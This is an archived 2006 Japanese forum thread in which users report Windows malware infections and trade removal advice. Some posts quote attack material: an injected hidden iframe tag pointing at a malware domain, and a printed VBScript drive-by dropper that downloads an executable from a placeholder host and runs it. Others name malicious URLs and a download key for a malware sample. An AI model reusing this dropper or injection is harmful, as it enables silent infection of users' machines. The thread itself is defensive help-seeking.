【使用OS】 WINXP Home SP2 【WINDOWS UPDATE】 自動更新。現在最新 【ウィルスソフト】 Norton Internet Security2006 【UPDATE】 自動更新。現在最新 【スキャン】 Nortonでスキャン→ウイルスなし カスペのオンラインスキャン→rundll.exeがTrojan-Spy.Win32.Delf.tt 【症状】 システムの復元が不可 シマンテックの検体提出ページにアクセス不可(俺だけ?) バスターのオンラインスキャンアクセス不可 【やったこと】 【とった処置】 scrファイルふむ→ケーブル引っこ抜き scrファイルを別PCのバスターでスキャンするとTSPY_DELF.DNOと表示されました。
489 :
486 :2006/12/06(水) 13:17:17
助けてください。
>>489 大至急KISを買ってきて駆除すればいい
>>486 とりあえず Bit Defender いれてスキャンやってみ、
非常駐型だからノートン入っていても競合起こさないから。
それで駆除できなければ、一度ノートン削除して、
>>490 が言うように他社のやつ入れればいい。
493 :
名無しさん@お腹いっぱい。 :2006/12/06(水) 14:23:01
494 :
名無しさん@お腹いっぱい。 :2006/12/06(水) 14:24:44
test
495 :
名無しさん@お腹いっぱい。 :2006/12/06(水) 16:01:31
zipファイルにantinyが検出されたんですが 解凍してファイルが例えば6個出てきたとして 感染ファイルを実行しなければ 他のファイルは普通に使用してOKなんでしょうか?
>>495 開いた途端に感染だよ
巣に帰れ、ダウソ厨
>>495 ウィルスが検出されてもなお解凍して見たいものってのは一体何なんだ?
駆除できたと思っても、再復活するウイルスもあるので、 誰も絶対安全かどうかの保証はしてくれない。 どのようなルートで所有したのかは別に興味はないが、 すべて「自己責任」でどうぞ
アルバムのmp3でした 解答thx
【使用OS】 WIN 2000 SP4 【WINDOWS UPDATE】 してます 【ウィルスソフト】 Error Doctor 2007 【UPDATE】 してます 【スキャン】 27個のリスクが見つかり、「Remove」というボタンを押すと製品の購入ページに接続する。 【症状】 海外のエロサイト見ていて、バナーをクリックしたら出てきた。 【やったこと】 騙されてインストール 【とった処置】 今はへこんでいます。
501 :
470 :2006/12/06(水) 17:48:19
>>471 >>472 >>481 レスありがとうございます。
Dr.Web CureIt!でスキャンしたらfromJASRAC.midiが検出されました。
↑のファイル削除したんですが、これで正常(?)になったことになるんですか?
>>478 うp仕方わからないので…
>>500 >【ウィルスソフト】 Error Doctor 2007
>【やったこと】 騙されてインストール
お茶ふいたw
505 :
503 :2006/12/06(水) 18:08:31
>>500 肝心な事を忘れていたわ。
その誘致ウイルスソフト「Error Doctor 2007」も削除しておいた方がいいね。
うpらなくていいです。
【やったこと】 【とった処置】 たいていどこのトラブルスレにもある項目。 で、大方の人の行動は 「状況をさらに悪化させた」 の一言に尽きる。
【やったこと】オナニー 【とった処置】ティッシュで処理
509 :
名無しさん@お腹いっぱい。 :2006/12/07(木) 00:35:46
TROJ_DYFICA.AW このウイルスに感染してしまったのですがどうしたらよいでしょうか? セキュリティソフトは入れてません。 今panda active scanの無料スキャン&駆除でスキャン中です。 どなたかマジレスお願いします(泣)
942 名前:名無しさん@お腹いっぱい。 [] 投稿日:2006/12/07(木) 00:37:48 New!! TROJ_DYFICA.AW このウイルスに感染してしまったのですがどうしたらよいでしょうか? セキュリティソフトは入れてません。 今panda active scanの無料スキャン&駆除でスキャン中です。 どなたかマジレスお願いします(泣) マルチ乙!!
512 :
486 :2006/12/07(木) 01:14:32
>>490 >>491 >>492 ありがとうございました。
まずbitdefenderインスコ→検知しない。
ノートン、bitdefenderをアンインスコしてKISお試し版で削除できました。
>>512 ノートンで反応無しでKISお試し版で駆除か
なんだかなぁw
普通だろ ノートンの糞検出率はテストで立証済み
二つ目は知らんけど、一つ目はDDoSってなってんじゃん
ファイル名で判断しない人希望
NODさんが上に反応してくれない
実行すれば反応するかもしれないけど実行する勇気はない
523 :
名無しさん@お腹いっぱい。 :2006/12/07(木) 04:42:49
【使用OS】 WIN xpSP2 ブラウザ:IE 【WINDOWS UPDATE】 してます 【ウィルスソフト】 NIS・Ad-aware 【UPDATE】 してます 【スキャン】 keyなんたらハイジャッカー?を2個発見。 【症状】 googleキャッシュで円光サイト見たせい? 以前もそこを見たときは無反応だったんだが。 【やったこと】Ad-awareで削除。 【とった処置】Ad-awareで削除。 セキュリティ高・クッキーオフでも、スパイウェアってかかるんですか? おんなのはじめてです。
>>519 Kasperskyから返事あり。バックドアでした。
>おんなのはじめてです。 (*゜ー゜)
>>523 セキュリティインスペクタ機能で
ブラウザ設定のセキュリティホールを確認。
もっと勉強しろ。
527 :
523 :2006/12/07(木) 17:42:33
>>526 d。
問題点は、ユーザーパスワードが脆弱のみ。
しかし、本当にスパイウェアなら、NIS(常駐)が無反応ってなんなのさ。
ノートントラップにはひっかかるわ、安全なメールをスパム扱いするくせに、
ヘンな添付メールは直通だし、役立たず。
528 :
526 :2006/12/07(木) 19:00:27
>>525 -――‐- 、
/ ヽ ♪ じゃあ、
/ ヽ_乂_乂_乂丿 l 今夜は
| ∩ ∩ | お赤飯だね ♪
| ∪ ∪ |
/ `ヽ
/ r―0――――――┐丶
| |___0__o__,! l
゙、 l / ノ
ヽ、ヽ、――0-⊂二二ニ⊃
>-‐(⌒)== | |
(_ノ ̄  ̄ \__ (⌒)
/ └┬' ̄
/ _____ ⊥-‐(∬∫) 、
,,,-―''^ ̄ ( (∫∬∬) ) ̄`ー-、
`ー-ニ二ニ-‐'
531 :
526 :2006/12/07(木) 19:39:34
533 :
名無しさん@お腹いっぱい。 :2006/12/07(木) 21:01:50
535 :
526 :2006/12/07(木) 21:38:27
>>532 遠距離なんで、TTL値を目一杯上げて(265)Zipの状態でPass記入して送信してみたけど
成功しなかった。。。
>>535 >>532 っす。こっちの環境では送信は可能だった(受信通知もきた)から機能的には問題ないっぽい
しかし結構重かった('A`)あと、
> Zipの状態でPass記入して
とあるので、もしかして zip にパスワードかけたのかな
「should not be password-protected」らしいのでパス無しで平気だよ 勘違いだたらスマソ
537 :
526 :2006/12/07(木) 22:56:54
>>536 「should not be password-protected」見逃してたよ。
感染してないんで、とくに送るものが手元に無かったんだ。
みんなもっとスマンテックにクレーム出した方がいいよ。オンラインサポートフォームに箇条書きででもいいし。
続きは本スレで。。。
win2000でお勧めのセキュリティソフトは何でしょう? ノートンの新しいやつはXPでないと無理だし…
>>538 KasperskyかNOD32。
両方とも試用版があるんで使ってみるといいよ。
【使用OS】 windowsXP home edition sp1 【WINDOWS UPDATE】してない 【ウィルスソフト】 ウィルスバスター2007 【UPDATE】 してる 【スキャン】 した 【症状】 ローカルエリア内のhtmlファイル全てに <iframe src=どっかのURL></iframe> っていうインラインフレームのタグが追加されて書き換えられてた 【やったこと】ネットサーフィン 【とった処置】 ウィルスファイルの削除とインラインフレームの記述を削除 最初、インラインフレームに気付かなくて、ウィルスファイルを削除した後 ローカルにあったhtmlファイルを開いたら、またウィルスを読み込んだ。 ファイル置換ソフトを使ったんで、htmlファイルを修正するのは 楽だったけど、手間には変わりないんで、今ネット巡るのがちょっと怖い。
>>540 >【使用OS】 windowsXP home edition sp1
どうせなら無印XP使え
542 :
名無しさん@お腹いっぱい。 :2006/12/08(金) 07:57:13
【使用OS】 Windows2000
【WINDOWS UPDATE】 全て済み
【ウィルスソフト】 AVG Free
【UPDATE】 頻繁にしてる
【スキャン】 「AVG」 「Ad-Aware SE Personal」 「Spy-Bot」 「Windows Live Safety Center Beta」の4つをして、発見されたのは全て消した。
【症状】 勝手にIEが立ち上がり、「
http://pop.9v.cn/code/showpop.asp 」が開く。
「
http://bst96.com/ 」の時もマレにあり。
勝手にアクティブなウィンドウが変わる。(裏にあった窓やアプリにアクティブが行く)
【やったこと】 PCゲーム「Ultima」の攻略記事を探し、海外サイトをあちこち見たので、その時かと・・・。
【とった処置】 「AVG」 「Ad-Aware SE Personal」 「Spy-Bot」 「Windows Live Safety Center Beta」でスキャンし、発見されたものは全て消しました。
Ad-Awareで2つ発見、その後同じくAd-Awareをセーフモードでかけて6つ発見。
Windows Live Safety Center Betaでは16箇所の問題が出たけど、重要な修正が必要なのは1つと出て、その1つは削除された模様。
それでも相変わらず2種類のURLのIEが勝手に開きます・・・。
ウィンドウのアクティブもちょこちょこと変わる・・・。
スパイウェアなのかウィルスなのか、なんなんでしょう?
543 :
名無しさん@お腹いっぱい。 :2006/12/08(金) 11:19:40
テンプレ 【使用OS】XP 【WINDOWS UPDATE】済み。 【ウィルスソフト】norton AntiVirus 【UPDATE】してあった。12/5>12/7に手動でupdate 【スキャン】Nrton AntiVirusで完全スキャン 【症状】多分なし(分かりません) 今日、Norton AntiVirusで完全スキャンをしたらwrar330ja.exeがW32.fujack.Aに 感染していると出ました。 で、wrar330ja.exeだけをスキャンしたらやはり感染してるとなりました。 一応、定義ファイルの最新版を入れてもう一回スキャンしようと思って手動で定義ファイル をダウンロード、インストールしました。 で、もう一度スキャンしたら感染してるというのが出なくなりました・・・。 これは・・・Norton AntiVirus誤作動と考えてよいのでしょうか。
1000BASEのLANを組んでセキュリティソフトを動かしてるときと動かしてないとき のLAN内の速度差があんまり激しくないソフトはありますか?
545 :
名無しさん@お腹いっぱい。 :2006/12/08(金) 16:22:09
>>540 似たようなのにやられたよー。
いろいろあってC:\WINDOWS\Prefetchフォルダを監視してたら
IEのコンテキストメニューを使うたびにDr.WEB CureIt!で削除したはずの
ウィルスが復活するからから気づいた。
感染している.htm及び.htmlにアクセスするとTrojan.DownLoader.15621を
勝手にダウンロードして実行してる。
.htm及び.htmlのソースに追加されたiframeタグはコレ(http抜いた。踏むなよ?)
<iframe src="://97754866.ee28.cn/htm/" width="0" height="0" scrolling="no" frameborder="0"></iframe>
HDDの全部の.htmlと.htmに感染しているみたいだから
こっちも一大捜索中だー。マジ勘弁。
>>546 BKDR_HUPIGON.GEN は、総称なんで、後回し。
BKDR_HUPIGON.AHP が作成したファイルは BKDR_GRAYBIRD.GR として検出される。
BKDR_GRAYBIRD.GR が作成したファイルは BKDR_HUPIGON.AHP として検出される。
と書いてある。要は、
G_Server.DLL
G_Server.exe
Audio.exe
Audio_hook.dll
が Windows フォルダに無いかチェックする。そして、BKDR_HUPIGON.AHP / BKDR_GRAYBIRD.GR の対策方でレジストリを削除する。
思うに、これらのファイルが存在するが、実行はされてないと思うんだが……。
>>547 プログラムです。恐らく個人ユーザーが作成したもの(.exe)
ていうか製品だったら鼻っから販売元問い合わせると思うのだが。。
うpろうとおもったんだけどファイル自体消しちゃって無いぽ。。
>>552 一応訊いてみるけど、合法スレの住人?
違うならスルーで構わない
つか
>>545 でヤバい URL だと分かってるなら、ttp から書いたほうがいいとおもうんだ('A`)
>>554 いやどこの住人でもない、2ch自体はそれ程見ません。
ただ"mod_v15m"ってウィルス自体情報が無いみたいでここなら一度は上がってるかと
思って、ちょっと気になったので。まぁ前例が無いみたいなので
情報求めてる人間からすればこれで終わりかな。
URLは書いてから気づいたよ。スマソ
>>555 リカバリ。
P2Pソフト使うなら自己責任。
ウイルスに感染しても勿論自己責任。
アンチウイルスは入れてる?
セキュリティベンダーにファイル送って解析してもらえ そして巣に帰れ
みなさん バーチャルマシンを使いましょう あと、イメージバックアップもね
バーチャンのマシンは今使っています
家族のパソコンです。普段自分は全く触っていないので曖昧な点があります。申し訳ありません。 【使用OS】 WindowsXP Home Edition 【WINDOWS UPDATE】 かなり長い間(半年〜数年レベル)でやっていないと思います。 【ウィルスソフト】 Norton2004 【UPDATE】 完全に期限切れです。 【スキャン】 すぐに再起動されるのでスキャンできない状態です。 【症状】 パソコンのシャットダウンができず、再起動される。 操作中突然再起動される。インターネット接続中は大量のメール送信が行われ、 そのためのノートンのスキャンの重さでパソコンが固まる。 【やったこと】 Blasterではなかったので、Sasserかなと思いましたが、 終了カウントダウンのダイアログの表示はありません。 また、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のレジストリの値を見ても、"avserve.exe"などが見つかりませんでした。 現在セーフモードで起動中です。 【とった処置】 ファイアーウォールの設定をonにしました。 アップデートが完全に放置されていたりと酷いマシンですが、 どなたかご教授頂けたら嬉しいです。よろしくお願いします。
563 :
562 :2006/12/09(土) 15:21:53
とりあえず、メールの大量送信を止める方法だけでも 教えていただけたら助かります。本当によろしくお願いします。
564 :
名無しさん@お腹いっぱい。 :2006/12/09(土) 15:22:54
オンラインスキャン
566 :
562 :2006/12/09(土) 15:28:22
回答ありがとうございます。 でも、インターネットに接続すると、メールの大量送信が始まってしまうために、 パソコンが固まってしまうんです…。 無知で対策が浮かばないので、すみません…。
567 :
562 :2006/12/09(土) 15:29:59
>565 ありがとうございます。 ウィルスが確定してないのに、駆除ファイルをあてても大丈夫なんですか?
>>566 SafeModeで起動して手動で削除か
タスクマネージャで止めてみても
再送信するの?
止まるならその時点でスキャン
570 :
562 :2006/12/09(土) 15:34:27
すみません、何を削除あるいは止めればいいのでしょうか?
>>570 メール送信で止まるんならMailerを止める
ノートンなら最新ファイルをDLして手動であてて
スキャンする
削除はあきらかにおかしいもの、わからないなら
確定してからのこと
572 :
562 :2006/12/09(土) 15:43:45
何度もすみません。 メールソフトは起動されていない状態なのですが、 何かを止めればメール送信が止まるということですか? ノートンは、上記の通り、期限切れのため最新ファイルのDLができません…。
>>562 ルータ&アンチウイルスソフトを買ってくる
↓
リカバリ
↓
アンチウイルスのインストール
↓
WinUpdate
575 :
540 :2006/12/09(土) 18:29:18
>548 うちのはURLの数字が 81931053 だった。あとはタグの記述同じ。 これどっかに報告した方がいいのかな。 ファイルの修正は、ベクターで落としたTextSSっていうフリーソフトを使ったよ。 htmlファイルを全部リストアップして置換できる。便利だった。
>>548 これ解析したんだけど、2つ飛んだ先に細工されたVBScriptがある。
でActiveX使ってウイルス実行させてるんだけど、同じコードで実行ファイル変えて試したんだけど、動かなかった。
ウイルス自体は、大抵のアンチウイルスソフトで検出できるけど、実行されてしまうなら、リアルタイム検索が動いてないか、
もしくは、IEのセキュリティホールになるな。
コードはこんな感じ。もちろん、細工されて英数字になってるが。
<スクリプト language="VBScript">
on error resume next
Set xxxxxxxx = document.createElement("object")
xxxxxxxx.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set xxxxxx = xxxxxxxx.CreateObject("Microsoft.XMLHTTP","")
set xxxx = xxxxxxxx.createobject("Adodb.Stream","")
xxxx.type = 1
xxxxxx.Open "get", "
http://hoge/hoge.exe ", False ←ウイルス
xxxxxx.Send
xxxxxxx = "mdb.exe"
set xxxxx = xxxxxxxx.createobject("Scripting.FileSystemObject","")
set tmp = xxxxx.GetSpecialFolder(2) ←テンポラリフォルダ
xxxxxxx = xxxxx.BuildPath(tmp,xxxxxxx)
xxxx.open
xxxx.write xxxxxx.responseBody
xxxx.savetofile xxxxxxx,2
xxxx.close
set qqq = xxxxxxxx.createobject("Shell.Application","")
qqq.ShellExecute xxxxxxx,"","","open",0
</スクリプト>
【使用OS】 WindowsXP Pro SP2 【WINDOWS UPDATE】 最新のはず 【ウィルスソフト】 Norton2007 【UPDATE】 最新 【スキャン】 検出しないorz 【症状】 自分で認識できる範囲では、OS起動後スクリーン真ん中にドクロマークが出て不具合が出るなど ドクロマークはalt+f4で脱出可能、その後アプリ、コントロールパネル、レジストリがいじれない 流出系なのか破壊系なのかどういうことをするのか詳しい情報は調べても皆無。 【やったこと】 セーフモードで立ち上げてみてそれらしいファイル、自動起動を見てもなかった。 ググってみても今年10月前後辺りからの情報しかない、しかも感染したHP、Blogの管理人や 2chの住人全員がクリーンインストール、もしくは放置している、自力でウイルスだけ退治した人はまだ誰もいませんorz 情報ではノートン、アンチウイルス、マカフィーの大御所もすべて敗北。どうやらシステムが書き換えられているらしい?という話です。 【とった処置】 お手上げなので、第三者に被害が行かないように感染したPCは電源切っています。
583 :
540 :2006/12/09(土) 21:32:20
>577 すまん。感染元は分からない。 今自分が興味ある事のウェブリングやサーチから適当に飛んでは チラ見してウィンドウを閉じたり、すぐ次に移動したりしてるんで。 多分、そこら辺だと思うんだけど。 今日も恐る恐るサイト巡りしてて、ウィルスアラートは無かったけど 気になって手動検索したら2個見つかったよ。 VBS_SMALL.DOO っての。 リアルタイム検索はオンになってるのに。 ウィルスバスターのサイトでウィルス情報見たけど、セキュリティホールは 関係ないみたいなこと書いてあった。信用していいのかな? 自分もサイト運営してるんで、トップページにウィルスに感染した事と ウィルスチェックのお願いを書いておいた。 ちなみにサイト上にウィルスに書き換えられたファイルは無し。ウィルスも検出されず。 自分のサイトが感染源になってる事は無いと思うけど不安だ。
>>584 俺もそれなった('A`)
そこでウイルス晒してるな、解析できる神の降臨を待つか・・
>>586 ノーdスレにての情報
だれかが検体をSymantecに送ったようだ
摘出できたやつがいるらしい
>>584 回復コンソールで立ち上げてc:\windows\system32\kernel32.dllを修復、
c:\windows\system32\uidate.exeを削除して、ログオフしてセーフモードで
再起動してシステムの復元を行って感染前の日付を復元。
>>588 システムの復元オフにしてた奴は
実質回復不能なのか?
>>588 レジストリもぐちゃぐちゃになってるっぽいな
>>590 hijackthisというソフト使ってuidate.exeの文字列を含むエントリーを削除だろうな。
593 :
589 :2006/12/09(土) 22:45:11
誤爆スマンテック ○| ̄|_
>>594 すごいな
俺もここ一週間ばかりいろいろ情報調べてみたけど
なかなか該当のものが見つからなくて・・
ほとんどの情報が別物のドクロウイルス関係だったから
(話題の?)ドクロウイルスって奴、 感染して起動すると、デスクトップが表示される前にドクロが出現するというのは わかったんだけどね。 起動して、どこまで正常に立ち上がって、どこでドクロが出現するのかが、 一応知りたいんだけどな。
ログイン画面の時だよ、ログイン関係がおかしいのかな?と思って LogonUIなどでログイン画面を変えたりいじってたら 再起動した時にドクロ画面が出なかった事がある、・・でも再起動はしたけどね
598 :
名無しさん@お腹いっぱい。 :2006/12/09(土) 23:13:08
今、感染中。 Alt+F4連打で一応脱出。無理やりIEは開けれるけど、ソフトの起動不可。 正常に終了や再起動ができないから、起動ボタン長押しでON/OFFしてる状態です。
これの正体ってまだ誰もわかってないの? 他人に攻撃するための土台にされたらたまらんのですが
600 :
597 :2006/12/09(土) 23:16:33
文章変になったけど前半の再起動はリセットボタン 後半の再起動はウイルスによる強制再起動の事ね アプリはほとんどダメだけど漏れの場合いくつか動くけどなぁ
>597 ログイン画面の時というと、winlogon.exeかuserinit.exeが読み込まれるとこ?
602 :
名無しさん@お腹いっぱい。 :2006/12/09(土) 23:19:46
603 :
名無しさん@お腹いっぱい。 :2006/12/09(土) 23:20:54
>602 つまり、「ようこそ」っていう画面のところだな。 なんとかして、レジストリエディタ開くこと出来ない?
605 :
名無しさん@お腹いっぱい。 :2006/12/09(土) 23:22:34
ようこその前かな
微妙な所だ、こっちはようこそ画面が一瞬も写らないうちに ドクロマークが出るな
BIOSもやられているのなら、どうしようもないが HD外付けで何とかできないか?
「ようこそ」の前に読みこまれるプロセスってなんだろうな… たくさんあるし、見分けるのも偉く大変だし。 PC起動→Windows XPのロゴが出る→「ようこそ」が出る前にドクロ
ようこそ画面がドクロになってるだけだったりしてw
>>608 お詳しいようですね。
リカバリができない俺にとっては大きな存在だよ(´・ω・`)
>>604 レジストリもソフトの起動もできない('A`)
>610 リカバリできない? リカバリディスク持ってないの?
>611 んー、ソフトを起動するときになんかのエラーメッセージが出てきて、起動できないとか?
xpの裏技でなんかあったような ようこそ前にプロンプトだす方法 でもメーカー限定だったような
>615 リカバリディスクがあるんならできるんじゃないか? 取扱説明書の「リカバリ(PCを購入状態を戻す)」か、「再セットアップ」っていうページを 良く読んでやってみ。
>>616 感染してから2日目。丸一日説明書やサイトと格闘したけど
いまいちピンとこなかったんだよ(´・ω・`)
また明日頑張ります。ありがとう。
>617 リカバリに自信が無ければ、購入したお店に持っていって、 店員さんにリカバリ頼んでみるのも有りだと思うぜ。 無論、お金は取られるから、見積もりは取ってもらったほうがいいよ。
ってか今時ドクロとかww作った奴センス最悪だなwwww
620 :
名無しさん@お腹いっぱい。 :2006/12/10(日) 00:04:37
KNOPPIXから起動して復帰とかは? 作ってないか…
直った香具師の報告マダ━━━━━━(゚∀゚)━━━━━━??
622 :
名無しさん@お腹いっぱい。 :2006/12/10(日) 00:23:07
このドクロウイルス、ソフトの実行を妨げるというのだが、 regedit.exe(レジストリエディタ)とかregedt32.exe(レジストリエディタ)とか sfc.exe(システムファイルチェッカー)などの、.EXEファイルが開けなくなるんかな? command.com(コマンドプロンプト)は? スタート→ファイル名を指定して実行→command→OK
てか、新種のドクロウィルスに関して 勝手にタスクマネージャが開かれるようになったんだが・・・。
'OK'は内部コマンドまたは外部コマンド、操作可能なプログラムまたは バッチファイルとして認識されていません
>625 もしかして、ソフトを起動したときに出るエラーメッセージ?
>>627 いいえ。
ソフトを起動させようとダブルクリックしても、無反応なんです。
>628 マジっすかあ!? EXEファイルもcommand.comを起動不可能とは…
俺今PC内「uidateで検索したら Temporary Internet Filesのなかに「UIDate.html」見つけた・・ だいじょうぶか?
command.comでuidateってやったら ドクロマーク出てビビった・・・。
>>632 俺の場合、漫画DLしてクリックしたらexeファイルで
ハッとしたが、何もならなかったから展開して漫画読んでた。
次の日、感染した。
>631 command.comの起動はできるのか。 でも、cmd.exeの起動は不可能と。
漫画って何の漫画?
>>634 勘違いさせてごめん。
>>623 の方法で「OK」じゃなくて「uidate」ってやっただけだよ。
俺はワンピースのたしか43か44巻だったなorz
>636 ファイル名を指定して実行から「uidate」と入力してOKってこと? commandと入力してOK押しても無反応か?
スタート→ファイル名を指定して実行→command→OK →'OK'は内部コマンドまたは外部コマンド、操作可能なプログラムまたは バッチファイルとして認識されていません スタート→ファイル名を指定して実行→command→uidate ドクロマークが画面に出てビビった
スタート→ファイル名を指定して実行→regeditはどうよ
>640 >→'OK'は内部コマンドまたは(ry OKというのは、OKと入力するんじゃなくて、OKをクリックね。 またはEnterキーを押すってこと。 >スタート→ファイル名を指定して実行→command→uidate でドクロが出るんですね。 uidateと入力した時点でドクロが出るのか、もしくはuidateと入力して EnterもしくはOKを押すとドクロが出るのかどっち?
>>643 OKを押す所が無く、Enterを押しても改行されるだけでした。
ドクロについてはuidateと打ち込んでenterでドクロが出てきました。
>644 >改行されるだけ 普通だと、Enter押すとプログラムが起動するはずなのに? じゃあ、ファイルの検索というのは起動できる? スタート→検索
>646 では、PC内を「command.com」で検索してみて。 オプションで、探す場所はc:\ サブフォルダの検索にチェック
>>575 ソフトの紹介ありがとう。Devasってのを使ったけどそっちも落として使ってみる。
あとそうそう、こっちは拡張子.htm .asp .phpとhtm・asp・phpがファイル名に含まれるファイルに
iframeタグが追加されてたよ。
.htmと.htmlの検索だけじゃ不十分かもしれないから気をつけれ〜。
>>578 解析サンクスです。アクセスすると
C:\windows\system32\update\update.exe
C:\Documents and Settings\ユーザー名\Local Settings\Temp\mdb.exe
この2つが生成されてmdb.exeの方が実行されてました。
同時に起動したmdb.exeが即座にネットにアクセスしてたので…その後いろいろ悪さをするんだろうなぁ。
とりあえず嫌気が差したんで必要がないときはActiveXを止めておきます。
感染源は感染しているwebサイトかも?
iframeが追加されたhtmlファイル自体は検知してくれないんで知らずに踏んでる人が他にもいるかも…。
>>647 出てきませんでした^^;
普通は出てくるものなんですか?
systemファイル削除系か?
652 :
sage :2006/12/10(日) 01:42:08
ウィルスに感染して(´・ω・`)ショボボーン
ttp://pc7.2ch.net/test/read.cgi/pc/1062738190/ 662 :655:2006/12/09(土) 21:40:14 0
これがウイルス本体:悪用厳禁 DLkey=dokuro
を、scan。
常駐avast!検知せず。
非常駐 BitDefender 8 Free Editionが、反応。
File:
D:\Download\2chshare-mini_0081.zip=>000.jpg.exe
Suspected with:
BehavesLike:Win32.SMTP-Mailer
このスレ読んでなかったら、危いところだった。
>>650 フォルダオプションで全てのファイルを表示するように設定していました。
検索方法は「ファイルとフォルダすべて」→探す場所ドライブC、サブフォルダにチェック
を入れる方法であってますよね?
出てきませんでした(´・ω・`)
>653 そっか… それじゃ、regedit.exeは検索して見つかる?
>>654 regedit.exeの方もHITしませんでした・・・^^;
>655 やはり>651の言うようにシステムファイル削除系のウイルスか。 explorer.exeなどの全部のEXE形式のファイルがあぼーんされてるんじゃ…
各社、対処用ウイルス駆除ツール発表されたとして 一体どうやって実行させる気だろう・・・
windowsインストールDiskで回復コンソールからはいったらどう?
>>648 ちょっと調べてみたら、WindowsUpdateで2004年12月に対策されてる。
ttp://support.microsoft.com/kb/870669/ja 問題は、Adodb.StreamでローカルマシンのHDDにデータを書き込めるってところ。
で、IEではAdodb.Streamを起動できない。
なので、セキュリティソフト全OFFにして直踏みしてみた。結果、何も実行されなかった。
普通の人は踏んでも、多分問題無いと思う。
不明なのは、IEコンポーネントのブラウザ。IEでは起動しないが他は分からん。
>感染源は感染しているwebサイトかも?
>iframeが追加されたhtmlファイル自体は検知してくれないんで知らずに踏んでる人が他にもいるかも…。
感染源は、iframe srcの2つ先。だから、自分の周りでスキャンしても無意味。
>658 回復コンソールからEXEファイルの実行は不可能だと聞いているが
>>660 実行する必要もないと思うけど。
クロとされるファイル
c:\windows\system32\uidate.exeをdeleteするとか、
listsvc→disableするとかできないの?
>661 delコマンドで削除するよりも、renコマンドでリネームのほうが良いんじゃない?
>>659 thx!早速、レジストリエディタを開いて
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility
を見たら教えていただいたページのキーが既に作成されていましたΣ(゚Д゚;
使用しているブラウザはIEコンポのundonutです…。IEコンポマズ
>感染源は、iframe srcの2つ先。だから、自分の周りでスキャンしても無意味。
スキャン無意味ですか…orz とにかくひたすら防御に専念します。
>>662 それの方がいいかもね。
いずれにしろ、立ち上がってるwindowsから
入るよりCD−ROMから回復コンソールに入ったほうが
安全だと思う。
ようこそ画面が出る前、もしくはようこそ画面そのものがドクロなら 回復コンソールが起動可能な筈だからな。
>>652 の正体はC:\WINDOWS\network.exe
New Malware.j
こいつらしい
HijackThisは起動しないの? リカバリーのウィザードも? 拡張子をCOMに変えでもって駄目? アダ被にお世話になるのが一番だと思うが…
潜伏期間があるらしいから、発病前ならばなんとかできる「かも」しれないかな〜くらいじゃね? とりあえず現在まだPCがまともに動いている人は該当ファイルをOCない検索かけて調べてみるくらいだろう。 どのような条件で発病するのかはまだ不明だが、見つかった場合はPCそのままOFFにしないで稼働させておいたほうが無難かもな。 まあ、一応はいくつかのアンチウイルスソフトで発病前に駆除できたという報告もあるようだし・・・
リカバリーして元に戻るならいいけど、それすらもわからんから怖いな・・・
発病後の被害状況がどこまであるのかがまだ不明だからね BIOSや他のハードにまで及んでいたらもう手の施しようがないだろうな
674 :
673 :2006/12/10(日) 10:53:19
リカバリで直らんの??? かなりたちが悪くないか?
このドクロ専用スレ立ってもいいくれーだな あまりにも凶悪すぎるわこりゃ
681 :
初心者 :2006/12/10(日) 12:45:15
えっと、前々からパソコンの調子が悪くて困ってたら 脅威が検出された とかでウィルスに感染してるみたいなんです。 使ってるOSは「Windows2000Me」 で(これでいいでしょうか?) W32.Mydoom.AX@mm ってのに感染してるそうです。 色々とデータが危ないとか警告が出てるんですけど、 怖くて何も出来ないでいます><。 やっぱりお金を払って直してもらうしかないのでしょうか? お返事お待ちしてます。
2000とmeでは大違いなのだが。 金払うのが嫌なら、フリーのアンチウイルスソフトで検索してみる
>使ってるOSは「Windows2000Me」 ワロタ
687 :
初心者 :2006/12/10(日) 13:05:05
早速のお返事どうもです;; すみません、本体に Designed for Microsoft ――――――― Windows2000 Professional ――――――― WindowsMe というシールが貼ってあったもので・・。 今ちょっとパソコンを見たところ 「WinAntiVirusPro2006FreeInstall_jp」 「SystemDoctor 2006」 という見慣れないアイコンを発見しましたが、関係は無いでしょうか;; アンチウィルスソフトのダウンロードサイトが どこも英語ばかりなのでしばらく奮闘してみます。 助言の方有難うございます。
「WinAntiVirusPro2006FreeInstall_jp」 「SystemDoctor 2006」 はインスコするなよ
690 :
668 :2006/12/10(日) 13:22:32
691 :
初心者 :2006/12/10(日) 13:31:16
インスコはイントールのこと でいいんですよね? 自分は何も弄ってないのでそれ以前に何もしてなければ・・。 とりあえず、詐欺ソフト とのことですよね。 時々出てくる広告が不安だったので・・。 それと時々、突然ブルーバックのページに飛ばされて アダルトサイトの形跡云々のウィンドウが表示されるのも これが原因なんでしょうか?
>>690 の駆除方法はあくまでfoo氏のPC環境で行ったものなのでそこんところはよろしく。
と。
>>690 ご苦労様です
とりあえずは、感染してしまった人の結果報告を待ちましょう
ドクロウィルスの駆除方法は発見されていないんだね(´・ω・`)
>>694 これから感染予定のある人達用には
まだどこも正式なパッチファイルが出来ていないようで
一部のアンチウイルスソフトのヒューリスティック機能に引っかかるだけみたい
>>690 C:\WINDOWS\regedit.exe → C:\WINDOWS\regedit.com
C:\WINDOWS\system32\cmd.exe → C:\WINDOWS\system32\cmd.com
↑のコピー→リネームがミソですね。
でもHKEY_CLASSES_ROOT\comfile\shell\open\command
など他の実行ファイル形式にもし掛けられてたら救いようがない・・・
>>696 リネームの場所までたどり着けない俺って・・・('A`)
>>697 WINDOWインストールCD−ROMの回復コンソールからはいる。
アダ被のfooさんすげー! 俺も、regedit.exeをregedit.comにリネーム ログオン画面がドクロになるから、レジストリエディタから winlogonキーの内容の調査、プログラムファイルが開けなくなるから .exeキーとexefileキーの内容の調査もやろうとはしたんだが、 なんせ昨日の質問者、regedit.exeが見つからない(=ドクロに削除されたのかな?←俺もそう思った) と言うので、これ以上いろいろとさせるのは相手も疲れるだろうから、 諦めたわけだがね。 それにしてもfooさんは偉大な方だ。
>>699 昨日の質問者だよ。
昨日は付き合せてすいませんでした
>700 いえいえ、どうってこと無いですよ。
やはりアダ被は頼りになるな。
703 :
名無しさん@お腹いっぱい。 :2006/12/10(日) 21:04:14
